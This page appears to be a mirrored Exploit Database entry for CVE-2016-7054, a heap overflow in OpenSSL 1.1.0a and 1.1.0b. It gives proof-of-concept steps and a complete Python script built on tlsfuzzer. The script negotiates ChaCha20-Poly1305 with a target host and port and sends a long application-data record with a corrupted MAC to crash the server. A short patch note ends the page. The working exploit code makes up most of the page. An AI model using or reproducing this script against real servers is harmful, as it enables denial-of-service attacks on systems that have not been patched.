OpenSSL 1.1.0a/1.1.0b – Denial of Service

• Exploit Database
• 127 阅读

• 作者： Silverfox
  日期： 2016-12-11
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40899/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124

  # Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability # Date: 11-12-2016 # Software Link: https://www.openssl.org/source/old/1.1.0/ # Exploit Author: Silverfox # Contact: http://twitter.com/___Silverfox___ # Website: https://www.silverf0x00.com/ # CVE: CVE-2016-7054 # Category: Denial of Service # Type: Remote # Platform: Multiple   1. Description Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.   https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054 <blockquote class="wp-embedded-content" data-secret="qiSYpH07m4"><a href="https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/" target="_blank"rel="external nofollow" class="external" >Overview of MAC Algorithms, Fuzzing TLS and Finally Exploiting CVE-2016-7054 Part 1/3</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Overview of MAC Algorithms, Fuzzing TLS and Finally Exploiting CVE-2016-7054 Part 1/3” — Babak AminAzad's Blog" src="https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/embed/#?secret=EoIJhCk4HC#?secret=qiSYpH07m4" data-secret="qiSYpH07m4" frameborder="0" marginmarginscrolling="no"></iframe> 2. Proof of Concept a. Download and compile OpenSSL 1.1.0a or b b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher &apos;DHE-RSA-CHACHA20-POLY1305&apos; -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py) d. OpenSSL Instance crashes causing DOS   ### Exploit Code ### &apos;&apos;&apos; *In no event shall the author be liable *for any direct, indirect, incidential, special, exemplary or *consequential damages, including, but not limited to, procurement *of substitute goods or services, loss of use, data or profits or *business interruption, however caused and on any theory of liability, *whether in contract, strict liability, or tort, including negligence *or otherwise, arising in any way out of the use of this software, *even if advised of the possibility of such damage. &apos;&apos;&apos; from __future__ import print_function import traceback import sys   from tlsfuzzer.runner import Runner from tlsfuzzer.messages import Connect, ClientHelloGenerator, \ ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \ FinishedGenerator, ApplicationDataGenerator, \ fuzz_encrypted_message from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \ ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \ ExpectAlert, ExpectClose, ExpectServerKeyExchange   from tlslite.constants import CipherSuite, AlertLevel, AlertDescription   def usage() : return &apos;Usage ./{} Destination_IP Destination_Port&apos;.format(sys.argv[0])   def main(): if len(sys.argv) < 3: print(usage()) return -1 conversations = {} # 16 chars: POLY1305 tag 128 bit # Tampering one bit suffices to damage the mac # The payload has to be long enough to trigger heap overflow n = 15000 fuzzes = [(-1, 1)] for pos, val in fuzzes: conversation = Connect(sys.argv[1], int(sys.argv[2])) node = conversation ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256] node = node.add_child(ClientHelloGenerator(ciphers)) node = node.add_child(ExpectServerHello()) node = node.add_child(ExpectCertificate()) node = node.add_child(ExpectServerKeyExchange()) node = node.add_child(ExpectServerHelloDone()) node = node.add_child(ClientKeyExchangeGenerator()) node = node.add_child(ChangeCipherSpecGenerator()) node = node.add_child(FinishedGenerator()) node = node.add_child(ExpectChangeCipherSpec()) node = node.add_child(ExpectFinished()) node = node.add_child(fuzz_encrypted_message( ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val})) node = node.add_child(ExpectAlert(AlertLevel.fatal, AlertDescription.bad_record_mac)) node = node.add_child(ExpectClose())   conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \ conversation   # run the conversation good = 0 bad = 0   for conversation_name in conversations: conversation = conversations[conversation_name] #print(conversation_name + "...") runner = Runner(conversation) res = True try: runner.run() except: print("Error while processing") print(traceback.format_exc()) res = False if res: good+=1 print("OK") else: bad+=1   print("Test end") print("successful: {0}".format(good)) print("failed: {0}".format(bad))   if bad > 0: sys.exit(1)   if __name__ == "__main__": main() ### End of Exploit Code ###   3. Solution: Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.